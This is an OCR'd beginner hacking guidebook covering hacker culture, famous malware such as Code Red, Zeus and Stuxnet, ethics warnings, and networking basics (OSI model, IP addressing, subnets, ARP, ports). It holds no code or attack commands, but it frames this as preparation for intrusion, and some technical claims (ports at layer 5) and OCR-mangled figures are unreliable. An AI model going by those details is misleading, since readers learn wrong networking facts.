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Chapter 1 — Introduction 


The general public usually has two competing viewpoints of hackers. 
Some people revere them as brilliantly minded individuals while 
others look down on them as petty criminals. While both perceptions 
could be true for many expert hackers, the public’s perception has 
been twisted and contorted by what they see on television dramas and 
in the movies. Because your average user doesn’t understand how a 
computer or the Internet works from a technical perspective, they 
can’t hope to begin to understand what hackers actually do. 


In fact, the term ‘hacker’ usually carries a negative connotation to it. 
Ask any non-technical person what a hacker is, and they’ll give you a 
response such as, “They’re the bad guys that steal people’s credit 
cards, listen to my phone calls, and work with terrorist organizations.’ 
For some reason - likely accredited to entertainment media — hackers 
get a bad rap and most people would instantly assume that their 
behaviors are illegal. These stigmas couldn’t be further from the truth, 
because the reality is that there are many types of hackers. Some of 
them are good, some of them are bad, and some lie somewhere in 
between. There is no single motivation that drives every hacker and 
no blanket statement that you can use to accurately describe every 
hacker in the world. Also consider that hacking isn’t an inherently evil 
practice and you can do it legally. Some people even like to do it for a 
hobby. More practically, however, some people get paid big bucks as 
consultants to try to hack into a corporate network in an effort to find 
security holes. Be forewarned, though. If you start abusing your 
knowledge it is a slippery slope to the dark side, and nothing good 
ever happens once you're there. 


? 


If your curiosity has gotten the better of you, if you just want to be 
able to understand what’s going on in the movies and the news, or 
you have a goal of becoming a competent hacker, I want to personally 
introduce you to hacking and guide you to achieving your goals. The 
problem most people have when they want to start hacking is that 
they find material that isn’t written for novitiates. Once you get the 
basics under your belt and you can actually apply the knowledge you 
will learn in this book, you’ll find that you are much more educated 


than your peers and that technology is actually pretty exciting. As the 
tools hackers use have changed over the last couple decades, people 
that take an interest and develop a passion for hacking have changed 
as well. Though technology is only getting more complex with each 
passing year, the tools hackers utilize are becoming more 
sophisticated — making the learning curve much less steep for newbies. 


In this guide, I am going to teach you a lot of valuable information 
about hacking such as: 


-What hacking is and what hacking isn’t. 

-Hacking terminology and hacker culture. 

-Types of attacks and the most famous hacks of all time. 

-Ethical considerations and fair warnings about becoming a hacker. 


-Fundamental concepts that will serve as a foundation to build 
hacking skills. 


-How to install Linux operating systems using VMWare to setup 
hacking tools. 


-Step-by-step guides for ping sweeps and port scanning. 


-How to map network topologies and perform reconnaissance 
techniques. 


-How to use advanced software to find security holes. 


This is designed to be an all-inclusive guide that will not only give you 
an understanding of the basic technical concepts you will need to 
become a hacker, but also introduce you to some fascinating software 
and show you step-by-step how to use it. Pm sure most of you want to 
get started hacking right away, but I urge you to spend time learning 
the basics before moving on to some of the more challenging attacks 
discussed in this book. 


What it Takes to Become a Good Hacker 


One of the reasons some hackers become so successful is because they 
have a passion for what they are doing. Their personality drives them 
to tackle extremely difficult challenges, which is why some hackers 
break systems just to see if they can. If you are going to want to 
become a prolific hacker, it takes the same two things as any other 
skill you want to build: time and practice. If you can’t figure 
something out in the first two minutes, don’t give up. Some of the pros 
will spend weeks or even months planning and executing their attacks. 
And once you get the basics under your belt, you’re going to be able 
to implement these techniques in a matter of minutes. Arguably, I 
would say the hardest part for a newbie is getting their environment 
setup. Past that, things start to get easier and you can really start to 
sink your teeth into how the technology works. Before we get to the 
juicy details, we should begin with an overview of hacking so you 
understand some rudimentary concepts and perceptions about 
hacking. 


Chapter 2 - An Overview of Hacking 


To your average computer user who doesn’t understand much about 
Internet and network security, hackers are shrouded in a cloud of 
mystery. Most people don’t understand what they do or how they do 
it. And the movies don’t help to demystify them, either. Countless 
action movies portray a character that takes the role of a hacker that 
can break into top secret computer systems to save the world. When 
the camera pans over their computer screens, you see them typing 
strange letters and numbers into a command prompt that, for all you 
know, is a foreign language. Humorously enough, the hackers in the 
movies frequently use a tool called NMAP, which I will show you how 
to use later in this book. If you’ve seen The Matrix Reloaded, Dredd, 
Fantastic Four, Bourne Ultimatum, Die Hard 4, or The Girl With The 
Dragon Tattoo (among countless others), you have already seen actors 
using NMAP to facilitate their hacking endeavors in the movies. 


But what exactly is hacking? Hacking means a lot of different things to 
a lot of different people. It is an umbrella term used to describe 
hundreds, if not thousands, of various techniques that can be utilized 
to use computers and information systems in unintended ways. At its 
core, hacking means using a computer to gain unauthorized access to 
another computer system or data that is protected or restricted. This is 
the most conventional meaning of the word hacking. Once a hacker 
has gained access to an unauthorized system, he or she then has the 
ability to steal information, change configurations, alter information, 
delete information, and install further malicious code to capture even 
greater control over the target system. The list goes on and the sky is 
the limit regarding what an experienced hacker can do once they find 
a way into a computer system. 


However, there is a lot more to hacking than clicking a button to 
attack a computer. You will need to use tools and scanners to map the 
local network topology and use reconnaissance techniques to gather 
information and look for vulnerabilities. The good news for newbies is 
that these tools are highly automated today. In the past, hacking 
software hadn’t been created that aggregated vast amounts of code 
and tools into simple and easy to use commands. As such, hackers in 


the past needed highly intimate understandings of the technologies 
they were trying to break and it was difficult to do so. Having an 
extremely deep understanding of technology today will certainly help 
you become a better hacker, but my point is that these tools are 
becoming increasingly easy to use. In fact, there are young kids and 
teenagers that are too curious for their own good and take advantage 
of highly sophisticated tools to break into systems they have no 
business accessing. Understand that these tools simplify the hacking 
process considerably. If a teenager can hack into a system using 
simple tools, guess what? You can too! 


But what does it take to excel as a hacker? Well, most hackers have 
several things in common. First of all, they are experienced software 
developers and can craft malicious programs and viruses that further 
their cause. Furthermore, most hackers are competent Linux users. 
Linux operating systems are extremely secure and provide virtually 
limitless access to the latest penetration and security tools — for free! 
In addition, some Linux operating systems such as Kali Linux were 
designed for the sole purpose of hacking and network penetration. 
Linux can be scary for newbies, but I will show you how to run Linux 
and use some special tools later in this book in a simplified and easy 
to understand manner. Lastly, hackers almost always have a working 
knowledge of networking topics such as IP addresses, ports, and the 
dirty details of how different networking protocols operate. Some 
tools even exploit vulnerabilities in these network protocols, and the 
knowledge of these exploits combined with the ability to craft 
computer programs is what makes some hackers truly formidable. 


Some of these techniques are outside the scope of this book since this 
guide was created for beginners, but if you really want to excel as a 
hacker you would do well to study and practice these concepts. 
Though we won’t touch on software development in this guide, I will 
certainly show you step-by-step how to install and use some various 
hacking tools that the pros take advantage of and teach you the basics 
of networking addresses and protocols. 


Chapter 3 — Attack Types and Famous Viruses 


Most of you have probably heard of viruses, worms, malware, key 
loggers, rootkits, and Trojans before, but what the heck are these 
things and how to hackers utilize them to steal people’s data and 
disrupt their computer systems? Each of these tools are a little bit 
different from each other, but they all have one similar goal: to enter 
a target’s system to provide the attacker with information he or she 
doesn’t already have access to. No, I’m not going to show you how to 
craft nefarious computer software, but you should have a well- 
rounded understanding of these topics if you have any hope of calling 
yourself a hacker. 


First and foremost, you need to understand the concept of computer 
viruses because they are one of the most popular terms thrown around 
in discussions about cyber security and hacking. A computer virus is a 
piece of malicious code or software program that is able to infect a 
target system and then make copies of itself on other local computers. 
They are aptly named because they reproduce much like a virus in 
real life, and they facilitate their operations by attaching themselves 
to computer programs. Typically they either render a computing 
system completely useless or they seek to destroy data. Again, you'll 
hear about computer viruses in the movies a lot, so we’ll take a look at 
some of the most famous computer viruses of all time after defining 
the other terminology. 


A worm is very similar to a virus, and it’s true that the line between a 
virus and worm gets muddied and blurred. The largest difference is 
that worms are not attached to a computer program. They exist 
independently on the host system, and they often take advantage of 
network resources to spread to other hosts on the network they have 
compromised. Sometimes worms are also classified as malware, 
because there are only minute differences in the terminology. 
Colloquially, these terms are interchangeable but their meanings vary 
slightly in academic settings. 


Perhaps you have already experienced the negative consequences of 
malware. One of the most popular ways that malware is distributed is 
through the medium of online downloads, whereby a downloadable 
file has been corrupted with malware that the user then downloads 
and installs. You'll see this frequently with most files hosted with P2P 
(Peer-to-Peer) file sharing programs such as Bit Torrent. Malware gets 
its name by combing two other terms: MALicious softWARE. It can 
also be used as an umbrella term used to describe many different 
types of attacks, and it could mean any software that is used by an 
attacker to create access to a target’s data, block them from their data, 
or change information on their computer. 


Furthermore, a key logger is yet another type of malicious program, 
and as you might have guessed its sole purpose is to log the keystrokes 
of the user who has been infected. This is absolutely disastrous for the 
target user, because an attacker will be able to record and view every 
single key that the target types on their host system. This includes 
usernames and passwords, Google searches, private instant messaging 
conversations, and even payment card data. If an attacker has 
successfully installed a key logger, the target is at the mercy of the 
attacker. There’s no telling what the attacker could do next - they 
could hack into the target system by using the information they 
gathered such as usernames and passwords, steal money using their 
payment card data, or use their host system to carry out attacks on 
other hosts on the same network. 


Next, you should also be familiar with the idea of a rootkit. Rootkits 
are extremely dangerous because they serve to edit background 
processes in an effort to hide the malicious activities of an attacker. 
This will help viruses, key loggers, and other malicious code exist for 
extended periods of time without detection on the target system. They 
can even serve to hide software that would have been otherwise 
detected and quarantined by security software. 


Last but not least is the infamous Trojan horse, sometimes called a 
Trojan virus or a backdoor virus. They are extremely problematic 
because they can be slipped into innocent-looking applications and 
they are very hard to detect without the right security software. There 
could even be a Trojan horse lurking in the depths of your personal 


computer right now, and they are frequently used to gain complete 
control of a target system. 


Now that you have a basic understanding of the different types of 
malicious code hackers employ to do their bidding, you should know 
about some of the largest and most famous computer viruses of all 
time. Some of them are actually other types of malicious code such as 
Trojan horses, but people still refer to them as viruses. Any expert 
hacker will have heard of these famous attacks before, so you should 
know them as well. 


Also, if you get the inkling to try your hand at using one of these 
methods on your own by hunting around on the Internet for freely 
distributable code that will allow you to attack a target system, just 
know that you’re setting yourself up for a disaster. Humorously 
enough, some hacking newbies try to find rootkits and key loggers to 
attack hosts. But here’s the catch — some hackers actually facilitate 
their attack by taking advantage of people who want access to these 
types of programs. 


And the end result isn’t pretty. In the end, the newbie hacker might 
actually install an expert hacker’s virus and unknowingly infect their 
own operating system! And don’t forget that there are ethical and 
legal implications as well. Many, if not all, of the people responsible 
for these famous attacks were severely punished. So don’t try to 
research and implement these types of viruses at home! 


1. Code Red 


I know what you may be thinking, and no, this has nothing to do the 
movies. When people think of hacking in the movies, they think of top 
secret military bases getting hacked by a teenager and raising their 
alert level to ‘code red.’ Believe it or not, it is rumored that the two 
engineers who discovered and named this attack were merely drinking 
the disgusting cherry-flavored soda when they first identified the 
worm back in 2001. This worm was pretty darn nasty, and its targets 
were servers that were running the Microsoft IIS software for web 
servers. 


This attack relied heavily on an exploit found in the code that left 
servers vulnerable to a buffer overflow issue in an older version of 
code. However, it was a huge problem and very difficult to detect 
because it had the ability to run solely in memory (RAM, or short term 
storage as opposed to long term storage such as a hard disk drive). 
And things got out of hand pretty quickly, too. After it had 
compromised a system, it would then try to make hundreds of copies 
to infect other web servers. Not only that, but it gobbled up a ton of 
local server resources that all but crippled some of the target systems. 


2. Sasser 


Sasser is another worm designed to target Windows (noticing a 
pattern here?). It first found its way into the spotlight back in 2004 
and was created by a legendary and infamous hacker named Sven 
Jaschan who was also responsible for another famous worm named 
Netsky. One reason this worm made Internet security headlines was 
that it had affected more than a million targets! Yet again, this worm 
took advantage of a buffer overflow vulnerability that caused target 
systems to crash. 


It also made it nearly impossible to reboot your computer without 
removing the power cable and it caused many computers to crash 
completely. To be fair, most people saw this worm as a nuisance as 
opposed to a serious threat. But it cannot be denied that it caused 
massive and widespread disruption. It even infected critical 
infrastructure devices that caused networks to perform very poorly. 
Like other types of worms, it used its target computers to propagate 
and multiply itself to other computers. 


But one of the biggest problems with this worm is that users didn’t 
upgrade their operating systems after a patch had been created. Both 
public and private sector organizations were affected like news 
stations, transportation systems, healthcare organizations, and even 
some airline companies. But what was the end result? The damages 
were collectively chalked up to be approximately $18 billion dollars! 
What happened to the infamous Jaschan, you ask? Fortunately for 
him, he was still young so he received a slap on the wrist considering 
how much damage he did. He ended up with a suspended sentence 
lasting 21 months. 


3. Zeus 


The Zeus virus was really a Trojan horse created to infect (can you 
guess which operating system?) Windows machines in an effort to 
force them to carry out varying procedures that were deemed to be 
criminal activity. Most typically, it would be used to carry out key 
logging activities and man-in-the-middle attacks that would allow an 
attacker to first sift through web browsing information before sending 
it to the intended web server. It most frequently infected hosts by 
utilizing innocent-looking applications as a transport medium into the 
intended targets, but the attack also employed phishing techniques. 


After it had been discovered in 2009, it had ruined thousands of 
individual file download and FTP accounts from the largest banks and 
corporations. Those involved include Amazon, Bank of America, 
Oracle, and even Cisco. The attack also allowed the hackers to steal 
usernames and passwords to social media sites, email accounts, and 
banking information. 


4. The I Love You Attack 


The ‘I Love You’ attack is so impressive and revered in hacker 
communities because it created a whopping $10 billion dollars in 
estimated damages. What’s more impressive is that researchers believe 
that 10% of every computer connected to the Internet at the time was 
infected with this virus. Infecting 10% of the Internet with a computer 
virus is staggering to say the least. Things started becoming so terrible 
that some of the larger organizations as well as governmental agencies 
around the world started shutting down their mailing systems in an 
effort to avoid becoming infected. 


5. Melissa 


This naughty virus was supposedly named after an exotic dancer the 
creator, David L. Smith, had once known. Supposedly, the very root of 
the virus was an infected text document that was uploaded to the 
alt.sex Usenet group with the appearance of being a collection of 
usernames and passwords for subscription and membership-only 
pornographic websites. But once a user downloaded this Word 
document, all hell would break loose and the virus would activate. 


To start, the virus would look at the first 50 addresses in the infected 
host’s email address book and start sending those addresses emails. In 
turn, this would severely disrupt email services of large enterprises 
and governmental bodies. Furthermore, the virus would even corrupt 
documents by adding references to the television show The Simpsons. 
However, the original Word document was eventually traced back to 
Smith and he was arrested within a week of the virus’s propagation. 
Although Smith only ended up serving 20 months of prison time and a 
$5,000 fine (he originally had a 10 year sentence) because he turned 
snitch on other hackers and helped the FBI make more arrests. To top 
it all off, it was estimated that the damages from his virus totaled 
approximately $80 million dollars. 


6. The Conficker Worm 


The Conficker worm first appeared in 2008 and it comes from an 
unknown origin. This worm was especially troublesome because it 
created a botnet (a group of infected computers networked together) 
of more than 9 million different hosts that harmed governmental 
agencies, large enterprises, and simple individual users alike. This 
worm makes the top 10 list because it caused damages estimated at a 
staggering 9 billion dollars. It was able to infect Windows machines 
due to an unpatched vulnerability dealing with background network 
services. 


After a host had been infected with the worm, the worm would wreak 
havoc by preventing access to Windows updates and antivirus 
updates, and it could even lock user accounts to prevent people from 
logging in and cleaning up the worm. If that weren’t bad enough, the 
worm would then continue its attack by installing malicious code that 
would make the target computer part of the botnet and scam users 
into sending the attacker money by holding their computer ransom. 
Microsoft and third party antivirus software providers eventually 
released updates to combat and patch this worm, but it did massive 
amounts of damage before a solution could be reached. 


7. MyDoom 


MyDoom was first seen back in 2004, and it was one of the fastest 
email worms to infect masses of computers since the I Love You 
attack. The creator of this attack is still unknown, but it is rumored 
that the creator was paid big money to carry out this attack due to the 
message included in the virus that read, “Andy, I’m just doing my job. 
Nothing personal, sorry.” 


This worm was incredibly sly because it took on the appearance of an 
email error. After a user had clicked on the “error” to view the 
problem the worm would send copies of itself to people found in the 
email address book of the infected system. Furthermore, it would copy 
itself into peer-to-peer directories on the infected hosts to spread 
throughout the network. It is also believed that the worm is still 
lurking on the Internet to this day, and it caused approximately $38 
billion dollars’ worth of damages. 


8. Stuxnet 


This attack has a somewhat political background as it is thought to 
have been created by the Israeli Defense Force in conjunction with the 
American government. While some of the past viruses were created 
out of malice, contempt, or the curiosity to see just how much damage 
a prolific hacker could create, this virus was created for the purpose of 
cyberwarfare. The goal was to stymy the initiatives of the Iranians to 
create nuclear weapons, and almost two thirds of hosts infected by 
this virus were located in Iran. 


In fact, it is estimated that the virus was successful in damaging 20% 
of the nuclear centrifuges in Iran. More specifically, this virus targeted 
PLC (Programming Logic Controllers) components which are central 
to automating large machinery and industrial strength equipment. It 
actually targeted devices manufactured by Siemens, but if it infected a 
host that didn’t have access to Siemens products it would lurk on the 
host system in a dormant state. Essentially, it would infect the PLC 
controllers and cause the machinery to operate far too fast — which 
would ultimately break the machinery. 


9. Crypto Locker 


This virus is another example of a Trojan horse that infected Windows 
machines, and the goal was to ransom target computers in exchange 
for money. This Trojan was very cunning because it had several 
different ways to spread to other computers. However, it was 
incredibly troublesome because after it had infected a host, it would 
then proceed to encrypt the hard drive with an RSA key that the 
owner of the computer never had access to. If you wanted your files to 
be unencrypted, you would have to pay money with prepaid methods 
or bitcoins to the initiators of the attack. 


Many people were successful in removing the Trojan from their 
computers, but they still had one gargantuan problem: the files on 
their hard drive were still inaccessible because they could not be 
decrypted without the key. Fortunately the leader of the attack, 
Evgeniy Bogachev, was caught and the keys used to encrypt the 
targets’ hard drives were released to the public. Apparently, the attack 
was successful in garnering $3 million from the ransoms, and it 
infected about half a million targets. 


10. Flashback 


I always love it when Apple evangelists claim to PC users that their 
computers are superior to Windows machines because their code is 
infallible and there is no way to get a virus on a Mac. While it’s true 
that Windows machines are more susceptible to viruses, Macs aren’t 
perfect either. Such was the case with the Flashback Trojan that was 
first observed in 2011. This Trojan used infected websites to inject 
faulty JavaScript code into the host browser, and it made infected Mac 
hosts part of a botnet. Believe it or not, this Trojan had infected over 
600,000 Mac computers and a few of those were even contained at 
Apple HQ. Also, though numerous warnings and solutions have been 
created for this Trojan, many believe it is still lurking in the depths of 
the Internet and that thousands of Macs are still affected. 


In Summary 


Viruses, malware, and Trojan horses are just one facet of hacking, 
though. The truth is that these viruses were created by experts who 
had a deeper knowledge of computing systems than many of the 
security experts. All of the people who carried out these attacks were 
expert software developers and coders. If you think you want to 
become as infamous as these types of hackers, you’re going to need to 
become an expert software developer. There’s no way around it. 
However, I would hope that this section only opened your eyes to the 
potential some of these attacks have to cause widespread devastation 
and costly damages. 


Again, please understand that the purpose of this guide isn’t to teach 
you how to create a program that will harm other people’s computers, 
rack up massive multimillion dollar damages, and leave you with 
heavy consequences such as prison time and ungodly fines. However, 
as a white hat hacker, you need to be aware that these types of attacks 
exist so you have a basic hacking vocabulary and some foundation 
knowledge. 


I will, however, show you how to crack various passwords, map 
network topologies, exploit vulnerabilities, and scan targets for 
security flaws. In these types of examples, we will be focused on 
hacking into a single target host or network instead of trying to 
release a plague upon the global Internet. All of that in good time, 
however, because first you need to understand the different types of 
hackers that lurk on the Internet, ethical considerations regarding 
your use of the knowledge in this book, and the consequences of your 
actions should you misuse this information and get caught red- 
handed. 


Chapter 4 — Ethical Considerations and Warnings 


A book about hacking would be irresponsibly incomplete without a 
chapter giving you a fair warning on the consequences of misusing 
these techniques as well as the ethical considerations of hacking. To 
begin this discussion, you need to be familiar with two different 
terminologies that describe different types of hackers: black hat and 
white hat. I like the imagery these terms bring to mind because they 
always seem to remind me of Spy vs Spy. 


Black hat hackers are what most people typically think of when they 
hear the word “hacker.” A black hat hacker is the type of nefarious 
Internet user who exploits weaknesses in computing systems for 
personal gain or in order to disrupt an organization’s information 
systems to cause them harm. He’s the guy wearing a high collared 
shirt, sunglasses, and a fedora behind an array of 20 or so computer 
monitors or the nerd in the movies who can break into a top secret 
system illegally. 


There really isn’t any good that can come out of adopting a black hat 
approach to hacking, either. When you hear in the media that a 
financial institution just lost thousands of usernames and passwords or 
that a social media database was compromised that caused vast 
amounts of people to lose sensitive personal information, the attack 
was carried out by a black hat hacker. Recently, there was even a 
module of code contained in a WordPress plugin that was susceptible 
to an XSS vulnerability (a type of security flaw in websites with 
caching plugins) that was being exploited worldwide by the extremist 
group ISIS. If you are reading this book because you have dreams of 
causing mass disruption and chaos, I would highly advise you to 
reconsider. However, understand that security and penetration tools 
aren’t inherently good or evil. One could argue that they are much 
like firearms in the sense that the weapon is an inanimate object and 
it is only as good or evil as the person wielding it. 


White hat hackers, on the other hand, are the complete opposite. 


They’re the good guys who do everything in their power to find 
potential security flaws and correct the errors so the black hat hackers 
can’t break a system. As you read this book, you need to consider all 
of the tools and techniques I show you from the perspective of a white 
hat hacker and use them responsibly. If you pursue white hat hacking 
professionally, you can add tremendous value to the organization you 
work for and make big money doing so. Some white hat hackers that 
have the CEH (Certified Ethical Hacker) certification make salaries 
well into the six figure range. Internet security is only becoming more 
important with each passing year, and a talented white hat hacker can 
use penetration testing tools and footprinting methods to identify 
disastrous security flaws on the organization’s network and 
information infrastructure and patch them before they become a 
problem that would cost the organization obscene amounts of money. 


Furthermore, you need to be aware of the consequences of misusing 
the knowledge you learn in this book. Though you likely won’t get 
caught snooping around a network attached to an unsecured SOHO 
(Small Office/Home Office) wireless network in your neighborhood or 
at your favorite local coffee shop, you need to respect other people’s 
rights to privacy. Think about it - how would you feel if you were 
sitting down for a cup of coffee while reading a book only to find out 
later that someone had attacked your Kindle over the coffee shop’s 
network and stole your data? You would feel enraged, irritated, and 
violated. So remember the golden rule as you grow into a white hat 
hacker. 


Also consider that using penetration tools on networks where you 
don’t have any authority to do so could lead to some extremely 
negative consequences. Let’s face it, you don’t have the right to steal 
other people’s personal information — it’s illegal. Not only could you 
provoke civil lawsuits, but you could even face jail or prison time 
depending on the nature of your offense. If you choose to do it on 
your employer’s network and you get caught, the best case scenario is 
that you would have some extremely uncomfortable questions to 
answer and the worst case scenario is that you would become fired. 
It’s just not worth it, so keep that in mind moving forward. 


Instead of testing out these techniques on public or corporate 


networks, my advice would be to try these in your very own home. 
Even a small home network will provide a digital playground for you 
to test out your new security skills. All you would need to run through 
some of these demos would be a personal computer, a wireless router, 
and preferably a few other devices that you can attach to your 
network. In the footprinting section I will show you how to run ping 
sweeps and other utilities to perform reconnaissance and information 
gathering methods, so having several other devices will give you more 
“toys” to play with on your local area network (LAN). 


By now I hope you understand that the word “hacker” is rather 
ambiguous. Years ago, it rightfully meant a black hat hacker. Today 
however, it could refer to any number of different types of people who 
are extremely knowledgeable about technology, and the term “hacker” 
doesn’t necessarily mean someone who is trying to steal intellectual 
property or break into a restricted network. Calling someone a hacker 
is the layman’s approach to describing a digital thief, but security 
professionals will often draw the line between the white hats and the 
black hats. 


With all of the dire warnings out of the way, we can now proceed to 
the juicer and more pragmatic sections of the book you have all been 
waiting for and we can begin to learn how you personally can get 
your feet wet with hacking. To begin, understand that this book is 
written with the assumption that you have little to no understanding 
of rudimentary networking and security concepts. Because this book is 
written for beginners as opposed to seasoned Internet security 
professionals and expert hackers, you need to first have a basic 
understanding of network terminology, addressing concepts, and other 
fundamentals that you will be able to use as a foundation to build 
your hacking skills upon. So, let’s get started networking 
fundamentals! 


Chapter 5 - Networking Fundamentals 


Understanding the OSI Model and Networking Terminology 


The OSI Model (Open Systems Interconnection) is one of the best 
places to begin if you are lacking a working knowledge of networking 
concepts. Just about every one of the demos we will run through 
together is heavily based on the OSI model and network security 
professionals often throw around terminology and jargon related to 
different components of this model. Also, it will benefit you personally 
if you understand what level of the OSI model various attacks target 
and this knowledge is fundamental to understanding IP addresses and 
ports, which we will cover later in this chapter. 


To begin, understand that the OSI model consists of seven different 
layers as follows: 


7. Application — A computer application that creates data such as an 
email or instant messaging program 


6. Presentation — The method of encoding data, such as ASCII text 
5. Session — TCP ports (FTP, POP, HTTP, HTTPS, etc.) 

4. Transport — TCP or UDP connections (among others) 

3. Network — IP addresses and packets 

2. Data-Link - MAC addresses and frames 


1. Physical — ones and zeros (bits) transmitted across a cable 


(*Note: If you don’t understand some of the terminology described 
above, take a deep breath and relax. We’ll get to that later.*) 


I realize that this list may look odd because it starts with the number 
7, but the first layer of the model is always represented on the bottom 
since each additional layer is dependent on its subordinate layer to 
encapsulate and transmit data. You can remember the first letter of 
each layer with the pneumonic ‘Please Do Not Throw Sausage Pizza 
Away’. We won’t go into great detail about the finer points of this 


model as we will really mainly be concerned with layers 2, 3, 4, and 5 
from a hacking perspective, but you need a high level understanding 
of the OSI model regardless. 


Each layer has its own specific function to facilitate data transmissions 
between two remote systems. As data (like the text in an instant 
messaging application) is generated on one device, it starts at the top 
of the OSI model in the application layer and gets pushed down 
through each subordinate layer until it becomes 0’s and 1’s on a cable 
at the physical layer. Each layer encapsulates data for transmission 
before sending it on to the next layer for further encapsulation. The 
process works much like Russian nesting dolls. Once the data has 
reached the physical layer, it gets transmitted as binary bits over a 
cable medium. Then, the receiving host unpacks the encapsulated data 
from each layer using the reverse process. 


This model is fundamental to understanding data transmission, but 
how will this help you build a skillset for hacking? First of all, it is 
essential to understand this model if you hope to learn about different 
network protocols and TCP/IP ports. Also, terminology is often 
thrown around regarding a device’s or protocol’s function and what 
layer of the OSI model it belongs to. For example, MAC addresses are 
a layer 2 address while IP addresses are a layer 3 address. And ports — 
which I am sure you have heard of before — belong to layer 5. We will 
dig into all of these concepts shortly, but first you need to know about 
IP addresses so you can identify various hosts when you are hacking! 


IP Addressing Essentials 


Of the fundamental concepts we are discussing in this book, IP 
addressing is by far the most important. But what is an IP address? 
Well, and IP address is a number that serves as a unique identifier that 
helps computers differentiate between hosts connected to their 
network. The most common analogy to describe this concept is that of 
the post system. If you wanted to mail a letter to someone (send them 
data), you would first need to know their home’s address (IP address) 
before your message could be delivered. 


Whether you know it or not, you have undoubtedly seen IP addresses 
already. They consist of four numbers ranging from 0-255 that are 
separated by periods as in the following example: 


- 192.168.1.1 


Also understand that an IP address is 32 bits long. We won’t dig into 
binary math because it won’t do much for our network penetration 
examples later in this book, but know that each number separated by 
a period in the address is called an octet. It is called this because each 
of the four numbers are 8 bits (1 byte) in length. However, this IP 
address lacks something called a subnet mask, so we don’t know 
what network it belongs to. 


Subnet Masks 


Each IP address is composed of two portions: the network portion of 
the address and the host portion. A subnet mask determines how 
much of the IP address defines a network and how much of the 
address identifies a host on that network subnet. For the remainder of 
this book, just note I will use the terms LAN (Local Area Network) and 
subnet interchangeably. Consider the following four examples of 
subnet masks: 


1. 255.0.0.0 (/8) — 8 bits (the first octet) define the network portion of 
the address. 


2. 255. 255.0.0 (/16) — 16 bits (the first two octets) define the 
network portion of the address. 


3. 255. 255. 255.0 (/24) — 24 bits (the first three octets) define the 
network portion of the address. 


4. 255. 255. 255. 255 (/32) — This subnet mask indicates a host 
address. It does not indicate a network subnet. 


Note that subnet masks can be written using two different notations. 
Consider the first example. 255.0.0.0 is just another way of writing 
“7/8” because they both indicate that the first octet in the IP address 
(the first byte or the first 8 bits) describes the network portion of the 
address. 


Did you notice how these four subnet masks are in multiples of 8? 
That was intentional because it makes our example much easier. The 
truth is that there are many more complex subnet masks such as /17, 
/21, or /30 that lie outside the scope of this book because they require 
binary math. However, on private home networks such as the 
environment where you will be testing our demos, a /24 subnet mask 
is by far the most common. I’d even bet big money that your home 
network device uses a /24 subnet mask. That is, unless you changed it 
-in which case you would already know about IP subnets! 


So, now it’s time to put two and two together. We are going to 


consider an IP address and a subnet mask together, determine the host 
and network portion of the address, and then determine the complete 
range of usable IP addresses for that subnet. Consider the following: 


à IP Address: 192.168.1.1 
- Subnet Mask: 255.255.255.0 


All right, so let’s chop up the IP address and define the network 
portion of the address. Can you work it out? When the subnet mask is 
applied to the IP address, we see that the first 3 octets determine the 
network subnet. So, 192.168.1.0 /24 is the network on which the host 
with the IP address 192.168.1.1 resides. That means that the last octet 
determines the host portion of the address. On the 192.168.1.0 /24 
network subnet, this host has the address of “1.” Furthermore, we can 
conclude that because each octet can range from 0 — 255 that other 
hosts on the 192.168.1.0/24 subnet can use addresses from 2-254 
(you never use the 0 or 255th address). Usable addresses on this 
subnet include 192.168.1.2 — 192.168.1.254. Understand that if the 
192.168.1.1 host was sending data to the host using the 192.168.1.2 
address, they are communicating over their LAN since they belong to 
the same network. 


Two Special Network Addresses 


So why don’t we use the 0 or the 255th addresses on a subnet as host 
addresses? Because these two addresses are special. The first one is 
called the network address. This address can’t be assigned to a host 
because it defines an entire network. In our example above, this 
address was 192.168.1.0. Also, note that the last address on a network 
subnet is the broadcast address. This address is used to send 
information to every host residing on that network at the same time, 
so this address can’t be used for a single host address either. In our 
previous example, the broadcast address is 192.168.1.255. 


MAC Addresses 


MAC (Media Access Control) addresses are layer 2 addresses, and they 
are globally unique. Each MAC address is contained on the network 
card of your computer, and it is composed of twelve hexadecimal 
digits (0-9, A, B, C, D, E, F) which total 48 bits in length. The 
following is an example of a MAC address: 


- B8EE:6525:7EA6 


The first half of the address — the first 6 digits — indicate the OUI 
(Organizationally Unique Identifier). This is just a fancy way of saying 
that it marks who manufactured the network card hardware in your 
computer. The last 6 digits are a unique identifier for that 
manufacturer’s network cards. 


Because MAC addresses are layer 2 addresses, they cannot be routed 
on the Internet. They belong in the data-link layer of the OSI model, 
and they can only help devices speak to one another on the same LAN 
via a layer 2 network switch. In order for layer 2 addresses and layer 
3 addresses to operate together, we need a mechanism that binds 
them together. 


ARP (Address Resolution Protocol) 


ARP is a network protocol that binds layer 2 addresses to layer 3 
addresses. Both networking devices and computers alike keep tables 
that record ARP information on the LAN so they can keep track of 
which MAC addresses are paired with which IP addresses. This 
information is constantly changing every time you take your laptop or 
mobile device to a new wireless network, and this information is 
critical to facilitating types of attacks such as a man in the middle 
attack. 


Basically, when a host wants to send data to another computer, it has 
some decisions to make regarding how it will send the data. Here’s 
how it works. The host first takes a look at its own IP address and 
determines if the destination host resides on the same subnet. If not, 
the host sends that information to its default gateway to be routed to 
the appropriate network. The host will look at its ARP table, find the 
matching entry for the default gateway, and address its data to the 
default gateway’s MAC address. However, if the destination host is on 
the same subnet, all it needs to do is find the matching MAC address 
for the destination IP and send it directly to the intended party. 


If you use a Windows computer, you can use the arp -a command 
from the command prompt to view the contents of your ARP cache. 
ARP is an integral part of modern networks, and there are many 
advanced exploits that revolve around manipulating this protocol, so 
you need to have a basic understanding of it. 


Ports and Firewalls 


Ports, which are also sometimes called sockets, were one of the hardest 
fundamental concepts for me to wrap my head around when I first 
started learning networking engineering and computer hacking years 
ago. Basically, they are numeric values that are part of the TCP/IP 
protocol suite that are used to tag different types of traffic. By tagging 
traffic, devices like firewalls can take different actions when different 
data streams flow through a network. 


There are literally thousands of different ports that are each used for 
different types of traffic and applications, but only a few of these are 
well-known protocols. Some software developers reserve certain ports 
for their custom application traffic, but you only need to be concerned 
with the well-known ports to get your feet wet with hacking. It is 
crucial that you have a basic understanding of ports because later we 
will go through the process of port scanning on your local network to 
ascertain which of these ports are open and which are closed. 


The following are some of the most common ports and their respective 
protocols and traffic types: 


-Port 80: HTTP (Hyper Text Transfer Protocol — used for web browsing 
and web pages) 


-Port 20/21: FTP (File Transfer Protocol — used to download files 
remotely) 


